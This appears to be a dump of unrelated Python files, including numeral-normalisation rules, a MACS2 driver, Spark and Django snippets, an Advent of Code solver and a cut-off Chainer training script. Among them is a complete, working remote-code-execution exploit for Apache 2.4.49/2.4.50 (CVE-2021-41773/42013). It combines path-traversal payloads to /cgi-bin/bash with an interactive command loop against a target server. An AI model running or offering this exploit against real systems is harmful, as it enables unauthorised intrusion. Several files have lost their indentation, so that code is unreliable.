        # Feminine adjective ending -> "одном" becomes "одной".
        if m.group(4) == 'й':
            new = new[:-1] + 'й'
        return new + m.group(3)
class CardinalRule_21(RuleBase):
    """Cardinal numerals. Prepositional case in "N из M" constructions.

    Example: "в 2 из 3 случаев -> в двух из ..."
    """
    def __init__(self):
        self.mask = r'\b([Вв] |[Оо] )(\d+)( из \d+ ([а-яё]+))\b'
    def check(self, m):
        digits = m.group(2)
        spelled = cardinal(digits, p_ca)
        # Feminine agreement when the numeral ends in 1 (not 11).
        if condition(digits) and words.have(m.group(4), [Z_GENDER], None, [1]):
            spelled = spelled[:-1] + 'й'
        return m.group(1) + spelled + m.group(3)
class OrdinalRule_40(RuleBase):
    """Ordinal numerals. Dative case.

    Example: "к 3 числу -> к третьему числу"
    """
    def __init__(self):
        self.mask = (r'\b([Кк]о? )(\d*[02-9][2-9]|\d*1\d|[2-9])'
                     r'( [а-я]+[ео](му|й) | )([а-яё]+)\b')
    def check(self, m):
        attr = words.get_attr(m.group(5))
        if attr.have(None, False, [2]):
            new = ordinal(m.group(2), 'd_mu')
            # Feminine agreement: "третьему" -> "третьей".
            if attr.have([Z_GENDER], False, [2]):
                new = new[:-2] + 'й'
            return m.group(1) + new + m.group(3) + m.group(5)
        return None
class CardinalRule_36(RuleBase):
    """Cardinal numerals ending in 1 (not 11). Dative case.

    Example: "к 21 возвышающемуся -> к двадцати одному возвышающемуся"

    Fix: the feminine branch rebuilt ``new`` from the numeral alone,
    discarding the matched preposition ("к "/"по ") from the output;
    the preposition (group 1) is now preserved, as the analogous
    prepositional-case rule CardinalRule_26 does.
    """
    def __init__(self):
        self.mask = (r'\b([Кк] |[Пп]о )'
                     r'(\d*[02-9]1|1)( [а-яё]+[ео](й|му)(|ся))\b')
    def check(self, m):
        new = m.group(1) + cardinal(m.group(2), d_ca)
        # Feminine adjective ending: derive "одной" from the
        # prepositional form ("одном" -> "одной").
        if m.group(4) == 'й':
            new = m.group(1) + cardinal(m.group(2), p_ca)[:-1] + 'й'
        return new + m.group(3)
class CardinalRule_37(RuleBase):
    """Decimal fractions. Prepositional case with measurement units.

    Example: "в 10,7 километра(х) -> в десяти целых семи десятых километра(х)"
    """
    def __init__(self):
        self.mask = (r'\b([Вв] (более чем |менее чем |))'
                     r'((\d+,|)(\d+)( [-и] | или )|)(\d+),(\d+) '
                     r'((|кило|санти|милли)метрах?|(|кило|мега|гига)парсеках?|'
                     r'процентах?|процентов|'
                     r'астрономической единицы|астрономических единиц|'
                     r'(морской |морских |)мили|(морских |)(миль|милях)|'
                     r'светового года|световых лет)\b')
    def check(self, m):
        new = m.group(1)
        # Optional first numeral of a pair/range.
        if m.group(3):
            if m.group(4):
                pre = decimal(m.group(4)[:-1], m.group(5), 4)
            else:
                pre = cardinal(m.group(5), p_ca)
            # Feminine units need "одной" instead of "одном".
            if condition(m.group(5)) and m.group(9) in (
                    'мили', 'миль', 'милях',
                    'морской мили', 'морских мили',
                    'морских милях', 'морских миль',
                    'астрономической единицы',
                    'астрономических единиц'):
                pre = pre[:-1] + 'й'
            new += pre + m.group(6)
        new += decimal(m.group(7), m.group(8), 4) + ' ' + m.group(9)
        return new
class CardinalRule_42(RuleBase):
    """Decimal fractions. Accusative case.

    Example: "в 10,1 процента -> в десять целых одну десятую процента"
    """
    def __init__(self):
        self.mask = (r'\b([Вв] (более чем |менее чем |))'
                     r'((\d+,|)(\d+)( [-и] | или )|)(\d+),(\d+)'
                     r'( ([а-я]+[оы](го|й|х) |)([а-я]+))\b')
    def check(self, m):
        attr = words.get_attr(m.group(12))
        new = m.group(1)
        # Optional first numeral of a pair/range.
        if m.group(3):
            if m.group(4):
                pre = decimal(m.group(4)[:-1], m.group(5), 5)
            else:
                pre = cardinal(m.group(5), v_ca)
                # Feminine agreement: "один" -> "одну", "два" -> "две".
                if attr.have([Z_GENDER], None, [1, 5]):
                    if pre[-2:] == 'ин':
                        pre = pre[:-2] + 'ну'
                    elif pre[-2:] == 'ва':
                        pre = pre[:-1] + 'е'
            new += pre + m.group(6)
        new += decimal(m.group(7), m.group(8), 5) + m.group(9)
        return new
class CardinalRule_40(RuleBase):
    """Cardinal numerals with the incorrect "-ми" suffix.
    Genitive/dative/prepositional case, plural.

    Example: "7-ми спелых/яблок -> семи спелых/яблок"
    """
    def __init__(self):
        self.mask = (r'\b(\d*[02-9]?[78]+)(-ми) ([а-яё]{2,})\b')
    def check(self, m):
        # Accept either a dictionary-confirmed plural noun or a plural
        # adjective ending ("-их"/"-ых").
        if (words.have(m.group(3), [M_GENDER, Z_GENDER, S_GENDER],
                       True, [1, 2, 5]) or (len(m.group(3)) >= 4
                                            and m.group(3)[-2:] in ('их', 'ых'))):
            return cardinal(m.group(1), r_ca) + ' ' + m.group(3)
        else:
            return None
class OrdinalRule_41(RuleBase):
    """Ordinal numerals before a feminine adjective + noun.
    Genitive/dative/instrumental/prepositional case.

    Example: "3-й артиллерийской роты -> третьей артиллерийской роты"
    """
    def __init__(self):
        self.mask = r'\b(\d+)-й( [а-яё]+[ео]й ([а-яё]+))\b'
    def check(self, m):
        noun_attr = words.get_attr(m.group(3))
        if not noun_attr.have([Z_GENDER], False, [1, 2, 4, 5]):
            return None
        return ordinal(m.group(1), 't_zh') + m.group(2)
class OrdinalRule_42(RuleBase):
    """Ordinal numerals before a masc./neuter adjective + noun.
    Instrumental/prepositional case.
    """
    def __init__(self):
        self.mask = (r'\b(\d+)-м( [а-яё]+[еиоы]м ([а-яё]+))\b')
    def check(self, m):
        number = ''
        attr = words.get_attr(m.group(3))
        if attr.have([M_GENDER, S_GENDER], False, [4]):
            number = ordinal(m.group(1), 't_mu')
        elif (attr.have([M_GENDER, S_GENDER], False, [5])
              # Second-locative forms not covered by the dictionary.
              or m.group(3) in ('берегу', 'бою', 'году', 'лесу', 'полку',
                                'пруду', 'саду', 'углу', 'шкафу')):
            number = ordinal(m.group(1), 'p_mu')
        if number:
            return number + m.group(2)
        else:
            return None
# ==========================
# Build the rule lists.
# ==========================
# NOTE: the order of the rules is significant; the inline notes record
# the grammatical case each rule handles and required orderings.
rules_list = (UnitRule_1(), # accusative
              UnitRule_2(), # must precede UnitRule_10 and UnitRule_13
              UnitRule_10(), # prepositional (before UnitRule_14)
              UnitRule_13(), # prepositional (must precede UnitRule_14)
              UnitRule_14(), # acc./dat. (must follow UnitRule_2)
              UnitRule_3(), # genitive (must precede UnitRule_4)
              UnitRule_4(), # genitive
              UnitRule_5(), # genitive (must follow UnitRule_4)
              UnitRule_15(), # genitive (must precede UnitRule_8)
              UnitRule_16(), # instrumental (must precede UnitRule_8)
              UnitRule_8(), # instrumental
              UnitRule_6(), # nominative/accusative
              UnitRule_7(),
              UnitRule_9(), # prepositional
              UnitRule_11(), # nominative
              UnitRule_12(),
              TimeRule_1(),
              TimeRule_2(),
              TimeRule_3(),
              TimeRule_4(),
              QuasiRoman(),
              RomanRule(),
              CardinalRule_40(),
              OrdinalRule_1(),
              OrdinalRule_2(),
              OrdinalRule_3(),
              OrdinalRule_35(),
              OrdinalRule_36(),
              OrdinalRule_37(),
              OrdinalRule_38(),
              OrdinalRule_6(),
              OrdinalRule_8(), # accusative, feminine
              OrdinalRule_9(), # genitive
              OrdinalRule_5(), # dative
              OrdinalRule_40(), # dative
              OrdinalRule_41(),
              OrdinalRule_42(),
              OrdinalRule_4(),
              OrdinalRule_39(),
              CardinalRule_20(), # prepositional /before accusative/
              CardinalRule_21(), # prepositional /before genitive/
              CardinalRule_23(), # accusative
              CardinalRule_37(), # prepositional /after 23 and before 25/
              CardinalRule_25(), # accusative
              CardinalRule_17(), # instrumental
              CardinalRule_18(), # instrumental
              CardinalRule_19(), # instrumental / before 14
              CardinalRule_30(), # dative
              CardinalRule_36(),
              CardinalRule_11(), # genitive
              CardinalRule_12(),
              CardinalRule_13(),
              CardinalRule_14(), # genitive
              CardinalRule_16(), # genitive
              CardinalRule_26(),
              CardinalRule_22(),
              CardinalRule_24(),
              CardinalRule_42(),
              CardinalRule_27(), # nominative/accusative
              CardinalRule_28(),
              CardinalRule_29(),
              CardinalRule_15(),
              CardinalRule_10(),
              CardinalRule_31(),
              CardinalRule_35(),
              Rule_1(),
              )
|
#!/usr/bin/env python
__author__ = "Akhilesh Kaushal","Cristian Coarfa"
import os,sys,re,argparse
import pandas as pd
import numpy as np
import glob
from itertools import permutations
import datetime
import subprocess
import csv
import time
class MACS2_CALL:
    """Driver that runs ``macs2 callpeak`` over a set of BED track files.

    Workflow: parse arguments, then :meth:`work` globs the track pattern and
    invokes MACS2 once per track, optionally with a control file and genome.
    """

    DEBUG = 1
    DEBUG_TrackCoverage = True   # when True, progress is logged to stderr
    DEBUG_genomicHash = None

    def __init__(self, myArgs):
        """Store the parsed command-line arguments on the instance."""
        print(myArgs)
        self.setParameters(myArgs)

    def setParameters(self, myArgs):
        """Record the argparse namespace for later use."""
        print("Setting parameters\n")
        self.myArgs = myArgs

    @staticmethod
    def parse_args(argv=None):
        """Parse command-line options.

        Args:
            argv: Optional list of argument strings; defaults to
                ``sys.argv[1:]`` (backward-compatible generalization that
                makes the parser unit-testable).

        Returns:
            The parsed namespace, or ``None`` when parsing fails, so the
            caller can bail out gracefully.
        """
        parser = argparse.ArgumentParser(description=
            """\
            Utility to identify peaks using MACS2 for multiple tracks \n
            * Load a number of BED files (usually ChIP-Seq, ATAC-Seq, MeDIP-Seq, Chipmentation, etc)
            * TODO: ...
            """)
        parser.add_argument('-t', '--trackFilePattern', help='pattern of tracks BED files', required=True)
        parser.add_argument('-i', '--inputfile', help='[OPTIONAL]input/control file', required=False)
        parser.add_argument('-g', '--genome', help='[OPTIONAL]For human and mice specify hg or mm and leave blank for others', required=False)
        parser.add_argument('-o', '--outfile', help='[OPTIONAL] output file name for overlap summary', required=False)
        try:
            args = parser.parse_args(argv)
        except SystemExit:
            # argparse raises SystemExit on bad input or --help; the original
            # bare `except:` hid every other error too — catch only this one.
            args = None
        return args

    def setupAnalysis(self):
        """Set up the analysis (output directory — currently a placeholder)."""
        sys.stderr.write("[" + str(datetime.datetime.now()) + "] setupAnalysis START \n")
        sys.stderr.write("[" + str(datetime.datetime.now()) + "] setupAnalysis STOP \n")

    def macs2_callpeak(self):
        """Run ``macs2 callpeak`` once per track file matching the pattern.

        Exits with status 4 when fewer than two tracks match, since the
        downstream overlap summary needs at least two distinct tracks.
        """
        sys.stderr.write("[" + str(datetime.datetime.now()) + "] macs2 callpeak START \n")
        trackFileList = glob.glob(self.myArgs.trackFilePattern)
        inputfile = self.myArgs.inputfile
        if len(trackFileList) < 2:
            sys.stderr.write("This utility requires at least 2 distinct tracks \n")
            sys.exit(4)
        for trackFile in trackFileList:
            OUT_NAME = trackFile.split(".")[0] + "_q_0.01"
            gene_name = self.myArgs.genome
            if self.DEBUG_TrackCoverage:
                sys.stderr.write("[" + str(datetime.datetime.now()) + "] Getting peaks for file " + trackFile + "\n")
            # Assemble the command incrementally instead of four near-duplicate
            # branches; -c / -g are appended only when supplied.
            str1 = 'macs2 callpeak -t ' + trackFile
            if inputfile is not None:
                str1 += ' -c ' + inputfile
            str1 += ' -n ' + OUT_NAME + ' -q 0.01 '
            if gene_name is not None:
                str1 += ' -g ' + gene_name
            if self.DEBUG_TrackCoverage:
                sys.stderr.write("[" + str(datetime.datetime.now()) + "] Running command " + str1 + "\n")
            # NOTE(review): os.system with concatenated paths is shell-injection
            # prone for untrusted filenames; kept for behavioral compatibility.
            os.system(str1)

    def work(self):
        """Entry point: set up, then call peaks for every track."""
        self.setupAnalysis()
        self.macs2_callpeak()
        # self.loadHomerProfiles()
        # self.outputsummary()
########################################################################################
# MAIN
########################################################################################
# Process command line options
## Instantiate analyzer using the program arguments
## Analyze this !
# Script entry point: parse arguments and run the analyzer.
if __name__ == '__main__':
    try:
        myArgs = MACS2_CALL.parse_args()
        print(f"Program arguments: {myArgs}\n")
        if myArgs is not None:
            analyzer = MACS2_CALL(myArgs)
            analyzer.work()
    except BaseException:
        # Report, then let the exception propagate unchanged.
        print("An unknown error occurred.\n")
        raise
|
import findspark
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from pyspark.sql.functions import desc
import time
from collections import namedtuple
import json
# Load user-specific settings (findspark path, socket host/port) once at
# import time; 'properties_user' must be a JSON file in the working directory.
with open('properties_user', 'r') as f:
    user_data = json.load(f)
def run_spark():
    """Start a Spark Streaming job that tallies tweet hashtags.

    Reads whitespace-separated text from the configured socket, keeps a
    20-second window over 10-second batches, counts lower-cased tokens that
    start with '#', and registers the top 10 counts in a temp table named
    "tweets". Blocks forever once started; kill the process to stop it.
    """
    findspark.init(user_data['findspark_path'])
    # Can only run this once. restart your kernel for any errors.
    sc = SparkContext()
    ssc = StreamingContext(sc, 10)   # 10-second batch interval
    socket_stream = ssc.socketTextStream(user_data['host'], user_data['port'])
    lines = socket_stream.window(20)  # sliding 20-second window
    fields = ("tag", "count")
    Tweet = namedtuple('Tweet', fields)
    # Use Parenthesis for multiple lines or use \.
    (lines.flatMap(lambda text: text.split(" "))            # Splits to a list
     .filter(lambda word: word.lower().startswith("#"))     # Checks for hashtag calls
     .map(lambda word: (word.lower(), 1))                   # Lower cases the word
     .reduceByKey(lambda a, b: a + b)                       # Reduces
     .map(lambda rec: Tweet(rec[0], rec[1]))                # Stores in a Tweet Object
     .foreachRDD(lambda rdd: rdd.toDF().sort(desc("count")) # Sorts Them in a DF
                 .limit(10).registerTempTable("tweets")))   # Registers to a table.
    ssc.start()
    # Keep the driver alive; the streaming job runs in the background.
    while True:
        time.sleep(0.1)
    # ssc.stop()
# ssc.stop()
# Script entry point.
if __name__ == "__main__":
    run_spark()
import numpy as np
import scipy
import matplotlib.pyplot as plt
import math
import csv
import cv2 as cv
# Merge two depth maps cell-by-cell: average where both have data, otherwise
# keep whichever sample is non-zero. Result is written to depth_mix.csv.
rows = []
with open('depth_1.csv', 'r', newline='') as csvfile:
    # creating a csv reader object and extracting each data row one by one
    csvreader = csv.reader(csvfile)
    for row in csvreader:
        rows.append(row)
# `np.float` was removed in NumPy 1.24 — use the builtin float dtype instead.
z1 = np.array(rows)
z1 = z1.astype(float)
ht = len(z1)
wd = len(z1[0])

# BUG FIX: the original kept appending depth_2 rows to the SAME `rows` list,
# so z2 started with a full copy of depth_1 and the merge below compared z1
# against its own values. Reset the accumulator before the second read.
rows = []
with open('depth_2.csv', 'r', newline='') as csvfile:
    csvreader = csv.reader(csvfile)
    for row in csvreader:
        rows.append(row)
z2 = np.array(rows)
z2 = z2.astype(float)

for i in range(len(z1)):
    for j in range(len(z1[0])):
        if z1[i, j] != 0 and z2[i, j] != 0:
            # Both maps have a reading: average them.
            z1[i, j] = (z1[i, j] + z2[i, j]) / 2
        elif z2[i, j] != 0:
            # Only the second map has a reading: take it.
            z1[i, j] = z2[i, j]

# newline='' per the csv module docs (avoids blank lines on Windows).
with open('depth_mix.csv', 'w', newline='') as f:
    p = csv.writer(f)
    for g in range(ht):
        p.writerow(z1[g, :])
from django.db import models
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from gene_register.models import Gene
class Variant(models.Model):
    """A genomic variant (chromosome/position with ref and alt alleles),
    linked to the gene it falls on."""

    chromosome = models.CharField(max_length=30)
    position = models.IntegerField()
    reference = models.CharField(max_length=30)    # reference allele
    alternative = models.CharField(max_length=30)  # alternative allele
    rs = models.CharField(max_length=30)           # dbSNP rs identifier
    gene = models.ForeignKey(Gene, on_delete=models.CASCADE)

    def __str__(self):
        # Same rendering as before, expressed as an f-string.
        return f"CH:{self.chromosome} Pos:{self.position}"
|
# Lists let you store several values in a single variable.
# A list is written with []:
lista_linguagens = ['Python', 'Java', 'C#', 'PHP', 'Javascript']
# Print the whole list:
print('Mostrando lista')
print(lista_linguagens)
print('------------------------------------')
# Access a specific element (remember: indices start at 0):
print('Mostrando elemento especifico')
print(lista_linguagens[0])
# Negative indices work too; -1 is the last element added to the list
print(lista_linguagens[-1])
print(lista_linguagens[-5])  # first element
print('------------------------------------')
# Change an element by assigning to its index:
lista_linguagens[2] = 'C++'
print(lista_linguagens)
print('------------------------------------')
# Add elements to the end of the list with append():
lista_linguagens.append('C')
lista_linguagens.append('Ruby')
lista_linguagens.append('C#')
lista_linguagens.append('Rusty')
print(lista_linguagens)
print('------------------------------------')
# Show the size of the list
print('Tamanho da Lista:', len(lista_linguagens))
print('------------------------------------')
# Remove the first occurrence of a value with remove()
lista_linguagens.remove('Ruby')
print(lista_linguagens)
print('------------------------------------')
# pop() removes the last element of the list
lista_linguagens.pop()
print(lista_linguagens)
print('------------------------------------')
# del removes an element by its position
del lista_linguagens[4]
print(lista_linguagens)
print('------------------------------------')
# A list can be copied into another one
lista2 = list(lista_linguagens)
# Iterate over a list with a for loop
for item in lista2:
    print(item)
print('------------------------------------')
lista3 = ['Ruby', 'Javascript', 'Visual Basic', 'Pascal', 'Lisp']
# Two lists can be merged into a new one
lista4 = lista2 + lista3
print('Lista 4')
for item in lista4:
    print(item)
#!/usr/bin/python
import my_pkg
# Interactive menu: dispatches to my_pkg helpers until the user picks 3.
if __name__== '__main__':
    a=0
    while 1 :
        # Re-prompt on every iteration; input() returns a string.
        a=input("Select menu: 1)conversion 2)union/intersection 3)exit ? ")
        if a=='1' :
            # Binary-number conversion (semantics defined by my_pkg.conversion).
            b=input("input binary number : ")
            print(my_pkg.conversion(b))
        elif a=='2' :
            # Union/intersection of two lists (parsing done by my_pkg.uni_inter).
            c=input("1st list: ")
            d=input("2nd list: ")
            print(my_pkg.uni_inter(c,d))
        elif a=='3' :
            print("exit the program...")
            exit(0)
        else :
            print("input wrong number")
|
from collections import Counter
import os
import wikidata
path = 'vocab'
def _types_vocab():
if not os.path.exists(os.path.join(path,'types.vocab')):
return []
with open(os.path.join(path,'types.vocab'), 'r') as f:
return f.read().splitlines()
def _properties_vocab():
if not os.path.exists(os.path.join(path,'properties.vocab')):
return []
with open(os.path.join(path,'properties.vocab'), 'r') as f:
return f.read().splitlines()
types = _types_vocab()
properties = _properties_vocab()
class Vocab():
    """Outputs vocab files for features that need it.

    Accumulates entity-type and wikidata-property frequencies over training
    instances, then persists the most common entries to the vocab files.
    """

    def __init__(self):
        self.types = Counter()       # entity type -> occurrence count
        self.properties = Counter()  # wikidata property -> occurrence count

    def call(self, instance):
        """Update both counters from one instance's candidate entities.

        NOTE(review): assumes instance.subject_entity / object_entity carry
        an extension `uri_candidates` (list of dicts with "types" and "uri"
        keys) — confirm against the pipeline that builds instances.
        """
        self.types.update([t for cand in instance.object_entity._.uri_candidates for t in cand["types"]])
        self.types.update([t for cand in instance.subject_entity._.uri_candidates for t in cand["types"]])
        subject_list = [x["uri"] for x in instance.subject_entity._.uri_candidates]
        object_list = [x["uri"] for x in instance.object_entity._.uri_candidates]
        wikidataProperties = wikidata.get_properties(subject_list, object_list)
        # Skip empty property names so they never reach the vocab file.
        self.properties.update([p for l in wikidataProperties.values() for p in l if p])

    def save(self):
        """Write both vocab files and refresh the module-level caches."""
        self.save_types()
        self.save_properties()

    def save_types(self):
        """Persist the 100 most common types, then reload the module cache."""
        # BUG FIX: without `global`, the reload below bound a local variable
        # and the module-level `types` cache was never refreshed.
        global types
        print(self.types.most_common())
        with open(os.path.join(path, 'types.vocab'), 'w') as file:
            for e, c in self.types.most_common(100):
                file.write(e)
                file.write('\n')
        # reload
        types = _types_vocab()

    def save_properties(self):
        """Persist properties seen at least 5 times, then reload the cache."""
        # BUG FIX: same local-shadowing problem as save_types.
        global properties
        print(self.properties.most_common())
        with open(os.path.join(path, 'properties.vocab'), 'w') as file:
            for e, c in self.properties.most_common():
                if c < 5:
                    # most_common() is sorted, so everything after is rarer.
                    break
                file.write(e)
                file.write('\n')
        # reload
        properties = _properties_vocab()
|
class Planet():
    """Node in the orbit tree: a named body, its parent, and its satellites."""

    def __init__(self, name, parent):
        self.name = name
        self.parent = parent
        self.children = []

    def totalOrbits(self):
        """Count direct + indirect orbits by walking up to the root."""
        count = 0
        node = self.parent
        while node is not None:
            count += 1
            node = node.parent
        return count
def main():
    """Part 1: print the total orbit count; part 2: print the minimal
    number of orbital transfers between YOU and SAN."""
    planetList = registerPlanets()
    orbitCount = 0
    for planet in planetList:
        orbitCount += planet.totalOrbits()
    print(orbitCount)  # part 1 answer
    startPlanet, endPlanet, sharedParents = searchForSharedOrbit("YOU","SAN",planetList)
    calculateShortestDistance(startPlanet, endPlanet, sharedParents)
def registerPlanets():
    """Parse "BODY)SATELLITE" lines from input_Day6.txt into Planet objects.

    Returns:
        A list of every Planet seen, with parent/children links set.
    """
    planets = []
    by_name = {}  # name -> Planet; replaces the original O(n) scan per line

    def _register(planet):
        # Helper: record a newly created planet in both structures.
        planets.append(planet)
        by_name[planet.name] = planet

    # `with` guarantees the handle is closed even if a line fails to parse
    # (the original leaked the handle on error).
    with open("input_Day6.txt", "r") as inputOrbits:
        for orbit in inputOrbits:
            bodyName, planetName = orbit.rstrip().split(")")
            satelite = by_name.get(planetName)
            body = by_name.get(bodyName)
            if body is None:
                body = Planet(bodyName, None)
                _register(body)
            if satelite is None:
                satelite = Planet(planetName, body)
                _register(satelite)
            else:
                # Satellite was created earlier as a parentless body.
                satelite.parent = body
            body.children.append(satelite)
    return planets
def searchForSharedOrbit(startPlanet, endPlanet, planetList):
    """Locate both named planets and the set of ancestors they share."""
    start = None
    end = None
    for candidate in planetList:
        if candidate.name == startPlanet:
            start = candidate
        if candidate.name == endPlanet:
            end = candidate
    # Intersection of the two ancestor sets.
    sharedParents = getAllParents(start, set()) & getAllParents(end, set())
    return start, end, sharedParents
def getAllParents(childPlanet, allParents):
if childPlanet.parent != None:
allParents = getAllParents(childPlanet.parent, allParents)
allParents.add(childPlanet.parent)
return allParents
def calculateShortestDistance(startPlanet, endPlanet, sharedParents):
    """Print the minimal number of orbital transfers between the two planets."""
    shortest = 999999  # sentinel larger than any plausible path length
    for ancestor in sharedParents:
        total = (calculatePlanetDistance(startPlanet, ancestor, 0)
                 + calculatePlanetDistance(endPlanet, ancestor, 0))
        shortest = min(shortest, total)
    # -2: hops out of the start and end bodies themselves don't count.
    print(shortest - 2)
def calculatePlanetDistance(startPlanet, destinationPlanet, distance):
    """Walk up from startPlanet counting hops until destinationPlanet.

    Callers pass distance=0; the accumulator is threaded through the
    recursion unchanged on the way down.
    """
    parentPlanet = startPlanet.parent
    if parentPlanet == destinationPlanet:
        return distance + 1
    # Equivalent to the original `distance += ...; return distance`.
    return distance + calculatePlanetDistance(parentPlanet, destinationPlanet, distance) + 1
main() |
# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Software Link: https://github.com/Balgogan/CVE-2021-41773
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013
# Credits : Lucas Schnell
#!/bin/python3
#coding: utf-8
import os
import re
import sys
import time
import requests
from colorama import Fore,Style
header = '''\033[1;91m
▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
''' + Style.RESET_ALL
if len(sys.argv) < 2 :
print( 'Use: python3 file.py ip:port ' )
sys.exit()
def end():
print("\t\033[1;91m[!] Bye bye !")
time.sleep(0.5)
sys.exit(1)
def commands(url,command,session):
directory = mute_command(url,'pwd')
user = mute_command(url,'whoami')
hostname = mute_command(url,'hostname')
advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
command = f"echo; {command};"
req = requests.Request('POST', url=url, data=command)
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
output = response.text
print(output)
if 'clear' in command:
os.system('/usr/bin/clear')
print(header)
if 'exit' in command:
end()
def mute_command(url,command):
session = requests.Session()
req = requests.Request('POST', url=url, data=f"echo; {command}")
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
return response.text.strip()
def exploitRCE(payload):
s = requests.Session()
try:
host = sys.argv[1]
if 'http' not in host:
url = 'http://'+ host + payload
else:
url = host + payload
session = requests.Session()
command = "echo; id"
req = requests.Request('POST', url=url, data=command)
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
output = response.text
if "uid" in output:
choice = "Y"
print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
print("[!] Sortie:\n\n" + Fore.YELLOW + output )
choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
if choice.lower() in ['','y','yes']:
while True:
commands(url,command,session)
else:
end()
else :
print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
except KeyboardInterrupt:
end()
def main():
try:
apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
payloads = [apache2449_payload,apache2450_payload]
choice = len(payloads) + 1
print(header)
print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
while choice >= len(payloads) and choice >= 0:
choice = int(input('[~] Choice : '))
if choice < len(payloads):
exploitRCE(payloads[choice])
except KeyboardInterrupt:
print("\n\033[1;91m[!] Bye bye !")
time.sleep(0.5)
sys.exit(1)
if __name__ == '__main__':
main()
|
#!/usr/bin/python3
"""Provides a function to append text to a file"""
def append_write(filename="", text=""):
    """Append *text* to *filename* and return the number of characters written."""
    with open(filename, 'a') as handle:
        written = handle.write(text)
    return written
|
#!/usr/local/anaconda3/bin/python3
from __future__ import division
import sys
sys.path.insert(0, '/home/machen/face_expr')
import cProfile
import pstats
import random
from chainer.datasets import TransformDataset
from time_axis_rcnn.extensions.special_converter import concat_examples_not_string
try:
import matplotlib
matplotlib.use('agg')
except ImportError:
pass
from time_axis_rcnn.constants.enum_type import OptimizerType, FasterBackboneType
from time_axis_rcnn.datasets.npz_feature_dataset import NpzFeatureDataset
from time_axis_rcnn.model.time_segment_network.faster_head_module import FasterHeadModule
from time_axis_rcnn.model.time_segment_network.faster_rcnn_backbone import FasterBackbone
from time_axis_rcnn.model.time_segment_network.tcn_backbone import TcnBackbone
from time_axis_rcnn.model.time_segment_network.faster_rcnn_train_chain import TimeSegmentRCNNTrainChain
from time_axis_rcnn.model.time_segment_network.segment_proposal_network import SegmentProposalNetwork
from time_axis_rcnn.constants.enum_type import TwoStreamMode
from time_axis_rcnn.model.time_segment_network.wrapper import Wrapper
import argparse
import os
import chainer
from chainer import training
from dataset_toolkit.adaptive_AU_config import adaptive_AU_database
import config
from chainer.iterators import MultiprocessIterator, SerialIterator
from dataset_toolkit.squeeze_label_num_report import squeeze_label_num_report
class Transform(object):
    """Data-augmentation transform that randomly mirrors a sample's feature
    sequence along the time axis and remaps the ground-truth segments to the
    flipped coordinate system."""

    def __init__(self, mirror=True):
        # mirror: when True, each sample is flipped with probability 0.5.
        self.mirror = mirror

    def __call__(self, in_data):
        # feature shape = (2048, N)
        feature, gt_segments_rgb, gt_segments_flow, seg_info, seg_labels, orig_label, _ = in_data
        if self.mirror:
            x_flip = random.choice([True, False])
            if x_flip:
                # Reverse the time axis of the features.
                feature = feature[:, ::-1]
                W = feature.shape[1]
                # Mirror the RGB segment endpoints: [min, max] columns swap
                # roles under the reflection x -> W - 1 - x.
                x_max = W - 1 - gt_segments_rgb[:, 0]
                x_min = W - 1 - gt_segments_rgb[:, 1]
                gt_segments_rgb[:, 0] = x_min
                gt_segments_rgb[:, 1] = x_max
                # Flow segments use W/10 as their axis length — presumably a
                # 10x-downsampled time axis; TODO confirm against the dataset.
                W_flow = W/10.
                x_max_flow = W_flow - 1 - gt_segments_flow[:, 0]
                x_min_flow = W_flow - 1 - gt_segments_flow[:, 1]
                gt_segments_flow[:, 0] = x_min_flow
                gt_segments_flow[:, 1] = x_max_flow
                # Reverse the per-frame labels along time as well.
                orig_label = orig_label[::-1, :]
        return feature, gt_segments_rgb, gt_segments_flow, seg_info, seg_labels, orig_label
def main():
    """Train the Time-axis R-CNN segment detector.

    Parses command-line options, builds the backbone/head/SPN model for the
    requested two-stream mode, restores any saved snapshots, and runs the
    Chainer training loop with logging/plotting extensions.
    """
    parser = argparse.ArgumentParser(
